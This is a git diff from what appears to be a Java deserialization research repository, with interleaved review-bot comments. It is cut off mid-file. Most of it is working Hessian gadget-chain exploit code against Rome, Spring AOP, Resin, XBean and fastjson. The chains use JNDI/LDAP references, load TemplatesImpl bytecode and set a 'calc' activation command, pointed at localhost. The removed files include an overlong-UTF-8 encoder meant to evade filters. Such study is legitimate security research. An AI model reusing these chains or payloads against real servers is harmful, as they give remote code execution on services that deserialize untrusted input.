aClass.getSuperclass(); - } - } - field.setAccessible(true); - field.set(obj, value); - } - - public static Object getFieldValue(Object obj, String fieldName){ - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - field.setAccessible(true); - return field.get(obj); - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } catch (IllegalAccessException e) { - throw new RuntimeException(e); - } - } - return null; - } - - public static TemplatesImpl getTemplatesImpl() throws IllegalAccessException, IOException { - TemplatesImpl templatesImpl = new TemplatesImpl(); - setFieldValue(templatesImpl, "_class", null); - setFieldValue(templatesImpl, "_name", "any"); - setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl()); - byte[] bytes = Files.readAllBytes(Paths.get("D://1tmp//classes//CalcAbs.class")); - setFieldValue(templatesImpl, "_bytecodes", new byte[][] {bytes}); - return templatesImpl; - } - - public static HashMap makeMap (Object v1, Object v2 ) - throws Exception { - HashMap s = new HashMap<>(); - setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = 
Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, - Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - setFieldValue(s, "table", tbl); - return s; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java deleted file mode 100644 index 1b722bc..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java +++ /dev/null @@ -1,9 +0,0 @@ -package com.hessian.asServlet; - -import com.hessian.pojo.Person; - -public interface Hello { - public String sayHello(String name); - - public Person changeAge(Person person, int age); -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java deleted file mode 100644 index d978ba0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java +++ /dev/null @@ -1,19 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.client.HessianProxyFactory; -import com.hessian.pojo.Person; - -import java.net.MalformedURLException; -import java.util.Properties; - -public class HelloClient { - public static void main(String[] args) throws MalformedURLException { - HessianProxyFactory factory = new HessianProxyFactory(); - Hello hello = (Hello) factory.create(Hello.class, "http://127.0.0.1:8081/hello"); - - String name = "1diOt9"; - System.out.println("test: " + hello.sayHello(name)); - - - } -} 
diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java deleted file mode 100644 index aa503e7..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java +++ /dev/null @@ -1,18 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.server.HessianServlet; -import com.hessian.pojo.Person; - -public class HelloServer extends HessianServlet implements Hello{ - @Override - public String sayHello(String name) { - System.out.println("Hello " + name); - return "Hello " + name; - } - - @Override - public Person changeAge(Person person, int age) { - person.setAge(age); - return person; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java deleted file mode 100644 index ea17da0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Input; -import com.hessian.pojo.Person; - -import java.io.FileInputStream; -import java.io.FileNotFoundException; -import java.io.IOException; - -public class DeserTest { - public static void main(String[] args) throws IOException { - FileInputStream fis = new FileInputStream("ser.bin"); - Hessian2Input hessian2Input = new Hessian2Input(fis); - Person obj = (Person) hessian2Input.readObject(); - hessian2Input.close(); - System.out.println(obj.getClass().getName()); - System.out.println(obj.getAge()); - - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java deleted file mode 100644 index b69ef4e..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java +++ /dev/null 
@@ -1,107 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Output; - -import java.io.IOException; -import java.io.OutputStream; -import java.lang.reflect.Field; - -public class Hessian2OutputWithOverlongEncoding extends Hessian2Output { - public Hessian2OutputWithOverlongEncoding(OutputStream os) { - super(os); - } - - @Override - public void printString(String v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v.charAt(i + strOffset); - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { -// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - @Override - public void printString(char[] v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v[i + strOffset]; - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { 
-// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - public int[] convert(int i) { - int b1 = ((i >> 6) & 0b11111) | 0b11000000; - int b2 = (i & 0b111111) | 0b10000000; - return new int[]{ b1, b2 }; - } - - public Object getSuperFieldValue(String name) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - return f.get(this); - } catch (Exception e) { - return null; - } - } - - public void setSuperFieldValue(String name, Object val) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - f.set(this, val); - } catch (Exception e) { - e.printStackTrace(); - } - } -} \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java deleted file mode 100644 index 970ddeb..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java +++ /dev/null 
@@ -1,47 +0,0 @@ -package com.hessian.deser; - -import com.alibaba.fastjson.JSONObject; -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.caucho.hessian.io.SerializerFactory; -import com.hessian.Tools; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.alibaba.fastjson.JSONArray; -import com.sun.org.apache.xpath.internal.objects.XString; - -import java.io.FileInputStream; -import java.io.FileOutputStream; -import java.io.IOException; -import java.util.HashMap; - -public class UTF_8_OverLong { - public static void main(String[] args) throws Exception { - TemplatesImpl templates = Tools.getTemplatesImpl(); - - JSONArray jsonArray = new JSONArray(); - jsonArray.add(templates); -// jsonArray.toString(); -// JSONArray jsonArray = new JSONArray(); -// jsonArray.add(templates); - XString xString = new XString("xx"); - - HashMap map1 = new HashMap(); - HashMap map2 = new HashMap(); - map1.put("yy",jsonArray); - map1.put("zZ",xString); - map2.put("yy",xString); - map2.put("zZ",jsonArray); - - HashMap hashMap = Tools.makeMap(map1, map2); - - FileOutputStream fos = new FileOutputStream("D://1tmp//utf8.bin"); - Hessian2OutputWithOverlongEncoding output = new Hessian2OutputWithOverlongEncoding(fos); - output.setSerializerFactory(new SerializerFactory()); - output.getSerializerFactory().setAllowNonSerializable(true); - output.writeObject(hashMap); - output.close(); - -// FileInputStream fis = new FileInputStream("utf8.bin"); -// new Hessian2Input(fis).readObject(); - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java b/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java deleted file mode 100644 index 6df809b..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java +++ /dev/null 
@@ -1,27 +0,0 @@ -package com.hessian.pojo; - -import java.util.HashMap; -import java.util.Properties; - -public class Person implements java.io.Serializable { - private String name; - private int age; -// private HashMap map; - - public Person() { - } - - public Person(String name, int age) { - this.name = name; - this.age = age; -// this.map = map; - } - - public int getAge() { - return age; - } - - public void setAge(int age) { - this.age = age; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java b/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java deleted file mode 100644 index 16cc623..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java +++ /dev/null @@ -1,28 +0,0 @@ -package com.hessian.ser; - -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.hessian.pojo.Person; - -import java.io.*; -import java.util.HashMap; - -public class SerTest { - public static void main(String[] args) throws IOException { - HashMap hashMap = new HashMap<>(); - hashMap.put("name", "maxyyy"); - - Person person = new Person("1diOt9", 20); -// FileOutputStream fos = new FileOutputStream("ser.bin"); - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - Hessian2Output output = new Hessian2Output(baos); - output.writeObject(hashMap); - output.close(); - byte[] bytes = baos.toByteArray(); - - ByteArrayInputStream bais = new ByteArrayInputStream(bytes); - Hessian2Input input = new Hessian2Input(bais); - input.readObject(); - input.close(); - } -} diff --git a/hessian/dubbo/src/main/java/org/example/Main.java b/hessian/dubbo/src/main/java/org/example/Main.java deleted file mode 100644 index 407f157..0000000 --- a/hessian/dubbo/src/main/java/org/example/Main.java +++ /dev/null @@ -1,7 +0,0 @@ -package org.example; - -public class Main { - public static void main(String[] args) { - System.out.println("Hello world!"); - } -} \ No newline at end of file 
diff --git a/hessian/pom.xml b/hessian/pom.xml new file mode 100644 index 0000000..58283dd --- /dev/null +++ b/hessian/pom.xml @@ -0,0 +1,81 @@ + + + 4.0.0 + + com.rois + Hessian + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.javassist + javassist + 3.30.2-GA + + + com.caucho + hessian + 4.0.60 + + + com.caucho + resin + 4.0.63 + + + org.apache.xbean + xbean-naming + 4.24 + + + javax.servlet + javax.servlet-api + 4.0.1 + + + javax.annotation + javax.annotation-api + 1.3.2 + + + + rome + rome + 1.0 + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + + + + + + + + + org.aspectj + aspectjweaver + 1.9.22.1 + + + com.alibaba + fastjson + 1.2.47 + + + + \ No newline at end of file diff --git a/hessian/src/main/java/com/test/HessianTest.java b/hessian/src/main/java/com/test/HessianTest.java new file mode 100644 index 0000000..13a6f04 --- /dev/null +++ b/hessian/src/main/java/com/test/HessianTest.java 
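Review bot: The dependency block pins deliberately old artifacts — `fastjson` 1.2.47 and `rome` 1.0 — with no comment saying they are chosen as gadget sources for the study code, so nothing stops this POM being copied as a template for a real service. I'd add one XML comment above the dependencies: `<!-- Versions are intentionally outdated for deserialization study; do not reuse this POM for production code. -->`. The run of empty added lines between `spring-boot-starter-web` and `aspectjweaver` looks like either extraction-stripped markup or commented-out entries; if they are commented-out dependencies they should be deleted rather than kept.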
@@ -0,0 +1,52 @@
+package com.test;
+
+import com.caucho.hessian.io.Hessian2Input;
+import com.caucho.hessian.io.Hessian2Output;
+import com.caucho.hessian.io.HessianInput;
+import com.caucho.hessian.io.HessianOutput;
+import com.test.pojo.Person;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+
+public class HessianTest {
+ public static void main(String[] args) throws IOException {
+ Person baka = new Person(1, "baka");
+ byte[] bytes = hessianSer2bytes(baka);
+ Person deser = (Person) hessianDeser(bytes);
+ System.out.println(deser.getName());
+ }
+
+ public static byte[] hessian2Ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ Hessian2Output hessian2Output = new Hessian2Output(baos);
+ hessian2Output.writeObject(obj);
+ hessian2Output.close();
+ return baos.toByteArray();
+ }
+
+ public static Object hessian2Deser(byte[] bytes) throws IOException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ Hessian2Input hessian2Input = new Hessian2Input(bais);
+ Object o = hessian2Input.readObject();
+ hessian2Input.close();
+ return o;
+ }
+
+ public static byte[] hessianSer2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ HessianOutput hessianOutput = new HessianOutput(baos);
+ hessianOutput.writeObject(obj);
+ hessianOutput.close();
+ return baos.toByteArray();
+ }
+
+ public static Object hessianDeser(byte[] bytes) throws IOException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ HessianInput hessianInput = new HessianInput(bais);
+ Object o = hessianInput.readObject();
+ hessianInput.close();
+ return o;
+ }
+}
diff --git a/hessian/src/main/java/com/test/client/HessianClient.java b/hessian/src/main/java/com/test/client/HessianClient.java
new file mode 100644
index 0000000..c098b17
--- /dev/null
+++ b/hessian/src/main/java/com/test/client/HessianClient.java
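Review bot: `hessianDeser` and `hessian2Deser` call `readObject()` with the default `SerializerFactory`, so they instantiate whatever class the byte stream names — the property the gadget classes in this commit rely on — yet nothing on the helpers marks them as test-only. I'd put a javadoc on both: `/** Test-only: reads bytes produced by the matching *Ser2bytes helper in this class. Never point this at data from a socket; a deserializer for untrusted input must first restrict classes via SerializerFactory#getClassFactory (allow/deny list). */`. Minor style: the streams are closed outside try-with-resources, which is harmless for byte-array streams but tends to get copied verbatim into code that wraps real sockets.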
@@ -0,0 +1,15 @@
+package com.test.client;
+
+import com.caucho.hessian.client.HessianProxyFactory;
+import com.test.server.Service;
+
+import java.net.MalformedURLException;
+
+public class HessianClient {
+ public static void main(String[] args) throws MalformedURLException {
+ String url="http://localhost:8080/MyTomcat/hessian";
+ HessianProxyFactory factory=new HessianProxyFactory();
+ Service service=(Service) factory.create(Service.class, url);
+ System.out.println(service.getCurrentTime());
+ }
+}
diff --git a/hessian/src/main/java/com/test/gadget/ResinGadget.java b/hessian/src/main/java/com/test/gadget/ResinGadget.java
new file mode 100644
index 0000000..1017b51
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/ResinGadget.java
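Review bot: The proxy created by `HessianProxyFactory` with default settings deserializes the response from `url` with the same unrestricted factory the gadget classes in this commit target, so the trust relationship runs in both directions and the file should say so. I'd add above `String url`: `// Local test endpoint only. A Hessian client deserializes server responses, so a client of an untrusted service is as exposed as the server is.`. Style: `String url="..."` and `factory=new` lack spaces around `=`, unlike the rest of the module. `Service` lives in `com.test.server`, which is outside this diff, so its contract can't be checked here.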
@@ -0,0 +1,58 @@
+package com.test.gadget;
+
+import com.caucho.hessian.io.Hessian2Input;
+import com.caucho.hessian.io.Hessian2Output;
+import com.caucho.hessian.io.SerializerFactory;
+import com.caucho.naming.QName;
+import com.sun.org.apache.xpath.internal.objects.XString;
+import tools.HessianTools;
+import tools.ReflectTools;
+import tools.UnsafeTools;
+
+import javax.naming.CannotProceedException;
+import javax.naming.Context;
+import javax.naming.Reference;
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.util.HashMap;
+import java.util.Hashtable;
+
+import static com.test.gadget.blackhat2025.XStringFSB2toString.unhash;
+
+public class ResinGadget {
+ public static void main(String[] args) throws Exception {
+ Object object = getObject();
+ byte[] bytes = HessianTools.hessian2Ser2bytes(object);
+ HessianTools.hessian2Deser(bytes);
+ }
+
+ public static Object getObject() throws Exception {
+ String refAddr = "http://127.0.0.1:8000/";
+ String refClassName = "Calc";
+
+ Reference ref = new Reference(refClassName, refClassName, refAddr);
+
+ Object cannotProceedException = Class.forName("javax.naming.CannotProceedException").getDeclaredConstructor().newInstance();
+ ReflectTools.setFieldValue(cannotProceedException, "resolvedObj", ref);
+
+ Class contiC = Class.forName("javax.naming.spi.ContinuationContext");
+ Context continuationContext = (Context) UnsafeTools.getObjectByUnsafe(contiC);
+ ReflectTools.setFieldValue(continuationContext, "cpe", cannotProceedException);
+ ReflectTools.setFieldValue(continuationContext, "env", new Hashtable());
+
+ // 创建QName
+ QName qName = new QName(continuationContext, "aaa", "bbb");
+ // 实现hash碰撞
+ String str = unhash(qName.hashCode());
+ // 创建Xtring
+ XString xString = new XString(str);
+
+ // 创建HashMap
+ HashMap finalMap = ReflectTools.makeMap(qName, xString);
+
+ return finalMap;
+ }
+}
diff --git a/hessian/src/main/java/com/test/gadget/RomeBased.java b/hessian/src/main/java/com/test/gadget/RomeBased.java
new file mode 100644
index 0000000..47189a0
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/RomeBased.java
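Review bot: Nine imports in ResinGadget are unused — `Hessian2Input`, `Hessian2Output`, `SerializerFactory`, `CannotProceedException` (the class is loaded by string via `Class.forName` instead), `ByteArrayInputStream`, `ByteArrayOutputStream`, `Constructor`, `Field` and `InvocationTargetException` — and should be dropped so the import list reflects what the class actually touches. The comment `// 创建Xtring` misspells `XString`, and the comments would be more useful in English like the identifiers. `getObject` also depends on `tools.ReflectTools`, `tools.UnsafeTools` and the static `unhash` import from `com.test.gadget.blackhat2025`, none of which are in this diff, so what `makeMap` does with its two arguments can't be verified here.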
@@ -0,0 +1,71 @@
+package com.test.gadget;
+
+import com.sun.rowset.JdbcRowSetImpl;
+import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ToStringBean;
+import tools.HessianTools;
+import tools.ReflectTools;
+import tools.TemplatesGen;
+
+import javax.xml.transform.Templates;
+import java.security.*;
+import java.util.HashMap;
+
+public class RomeBased {
+ public static void main(String[] args) throws Exception {
+ rome2SignedObj();
+ }
+
+ public static void rome2Jndi() throws Exception {
+ JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
+ jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/eae633");
+
+ ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class, jdbcRowSet);
+ EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
+ HashMap hashMap = ReflectTools.makeMap(equalsBean, "any");
+
+ byte[] bytes = HessianTools.hessianSer2bytes(hashMap);
+ HessianTools.hessianDeser(bytes);
+ }
+
+ // 二次反序列化
+ // 会触发三次,因为ToStringBean.printProperty间接触发两次EqualsBean.hashCode
+ public static void rome2SignedObj() throws Exception {
+ Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/CalcAbs.class");
+ ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
+ EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
+ HashMap hashMap = ReflectTools.makeMap(equalsBean, "any");
+
+ // 初始化 SignedObject 所需的密钥和签名工具
+ KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+ keyPairGenerator.initialize(1024);
+ KeyPair keyPair = keyPairGenerator.genKeyPair();
+ PrivateKey privateKey = keyPair.getPrivate();
+ Signature signingEngine = Signature.getInstance("DSA");
+ // 创建 SignedObject 对象,对 map 进行签名
+ SignedObject signedObject = new SignedObject(hashMap, privateKey, signingEngine);
+
+
+ ToStringBean toStringBean2 = new ToStringBean(SignedObject.class, signedObject);
+ EqualsBean equalsBean2 = new EqualsBean(ToStringBean.class, toStringBean2);
+ HashMap hashMap2 = ReflectTools.makeMap(equalsBean2, "any");
+
+ byte[] bytes = HessianTools.hessianSer2bytes(hashMap2);
+ HessianTools.hessianDeser(bytes);
+
+
+ }
+
+
+ // 失败,因为hessian无法反序列化transit和static变量
+ public static void rome2Templates() throws Exception {
+ Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/Calc.class");
+ ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
+ EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
+// equalsBean.hashCode();
+ HashMap hashMap = ReflectTools.makeMap(equalsBean, "any");
+
+ byte[] bytes = HessianTools.hessianSer2bytes(hashMap);
+ HessianTools.hessianDeser(bytes);
+ }
+}
diff --git a/hessian/src/main/java/com/test/gadget/SpringBased.java b/hessian/src/main/java/com/test/gadget/SpringBased.java
new file mode 100644
index 0000000..6301a9b
--- /dev/null
+++ b/hessian/src/main/java/com/test/gadget/SpringBased.java
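Review bot: The comment above `rome2Templates` says "transit" where `transient` is meant, and since that comment is the only record of why the variant fails it should read `// Fails: Hessian does not serialize transient or static fields, so the Templates state is lost`. `rome2Jndi` and `rome2Templates` are never called — `main` only runs `rome2SignedObj` — so a one-line class javadoc saying which variant `main` demonstrates and that the other two are kept for comparison would help the next reader. Style: `import java.security.*;` is the only wildcard import in the module; the six `java.security` types used here should be imported explicitly, and the commented-out `// equalsBean.hashCode();` should be deleted rather than left in.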
@@ -0,0 +1,82 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.springframework.aop.aspectj.AbstractAspectJAdvice; +import org.springframework.aop.aspectj.AspectJAroundAdvice; +import org.springframework.aop.aspectj.AspectJPointcutAdvisor; +import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory; +import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor; +import org.springframework.aop.support.DefaultPointcutAdvisor; +import org.springframework.aop.target.HotSwappableTargetSource; +import org.springframework.jndi.support.SimpleJndiBeanFactory; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.HashMap; +import java.util.HashSet; +import java.util.Set; + +public class SpringBased { + public static void main(String[] args) throws Exception { + Object o = pointcutAdvisor(); + byte[] bytes = HessianTools.hessian2Ser2bytes(o); + HessianTools.hessian2Deser(bytes); + } + + public static Object advisorHolder() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add("any"); + + // 直接通过构造方法会提前执行 + BeanFactoryAspectInstanceFactory beanFactoryAspectInstanceFactory = (BeanFactoryAspectInstanceFactory) UnsafeTools.getObjectByUnsafe(BeanFactoryAspectInstanceFactory.class); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "name", url); + + AbstractAspectJAdvice aspectJAroundAdvice = (AbstractAspectJAdvice) UnsafeTools.getObjectByUnsafe(AspectJAroundAdvice.class); + ReflectTools.setFieldValue(aspectJAroundAdvice, "aspectInstanceFactory", beanFactoryAspectInstanceFactory); + + AspectJPointcutAdvisor aspectJPointcutAdvisor = (AspectJPointcutAdvisor) 
UnsafeTools.getObjectByUnsafe(AspectJPointcutAdvisor.class); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "advice", aspectJAroundAdvice); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "order", null); + + Class aClass = Class.forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder"); + Object objectByUnsafe = UnsafeTools.getObjectByUnsafe(aClass); + ReflectTools.setFieldValue(objectByUnsafe, "advisor", aspectJPointcutAdvisor); + + Object xString = UnsafeTools.getObjectByUnsafe(XString.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(xString); + HotSwappableTargetSource other = new HotSwappableTargetSource(objectByUnsafe); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + + return hashMap; + } + + public static Object pointcutAdvisor() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add(url); + ReflectTools.setFieldValue(simpleJndiBeanFactory, "shareableResources", set); + + + + Object defaultBeanFactoryPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultBeanFactoryPointcutAdvisor.class); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "adviceBeanName", url); + + // AbstractPointcutAdvisor的子类,且没实现equals方法的都行, AsyncAnnotationAdvisor\DefaultPointcutAdvisor + Object defaultPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultPointcutAdvisor.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(defaultPointcutAdvisor); + HotSwappableTargetSource other = new HotSwappableTargetSource(defaultBeanFactoryPointcutAdvisor); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + return hashMap; + } + +} 
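Review bot: In `advisorHolder` the local `set` is created and filled with `"any"` but never read, so `Set set = new HashSet(); set.add("any");` is dead code and should go (in `pointcutAdvisor` the equivalent set is actually installed with `setFieldValue`). Both methods repeat the same `url` literal and `SimpleJndiBeanFactory` setup; a `private static final String URL` constant would keep them in step. The raw `Set`/`HashSet`/`HashMap`/`Class` types should be parameterised (`Set<String>`, `Class<?>`), which also removes the unchecked warnings.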
diff --git a/hessian/src/main/java/com/test/gadget/XBeanGadget.java b/hessian/src/main/java/com/test/gadget/XBeanGadget.java new file mode 100644 index 0000000..58f16a5 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/XBeanGadget.java @@ -0,0 +1,38 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.apache.xbean.naming.context.WritableContext; +import org.springframework.aop.target.HotSwappableTargetSource; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.naming.Context; +import javax.naming.NamingException; +import javax.naming.Reference; +import java.util.HashMap; + +public class XBeanGadget { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + String refAddr = "http://127.0.0.1:8000/"; + String refClassName = "Calc"; + + Reference ref = new Reference(refClassName, refClassName, refAddr); + WritableContext writableContext = new WritableContext(); + + // 创建ReadOnlyBinding对象 + String classname = "org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding"; + Object readOnlyBinding = Class.forName(classname).getDeclaredConstructor(String.class, Object.class, Context.class).newInstance("aaa", ref, writableContext); + + XString xString = new XString("any"); + + HashMap finalMap = ReflectTools.makeEqualMap(xString, readOnlyBinding); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java new file mode 100644 index 0000000..6e979b9 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java 
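Review bot: `javax.naming.NamingException` is imported in XBeanGadget but never used; remove it. The `Class.forName(classname).getDeclaredConstructor(String.class, Object.class, Context.class).newInstance(...)` line would read better split over two statements, with the existing Chinese comment replaced by an English one that says why reflection is needed rather than just that the object is created — I cannot confirm the target type's visibility from the hunk, so write it as `// instantiated reflectively; the type is not directly constructible here (confirm visibility)`. `HashMap finalMap` is a raw type.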
@@ -0,0 +1,54 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import javafx.beans.property.IntegerProperty; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; + +public class AudioFileFormat2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", 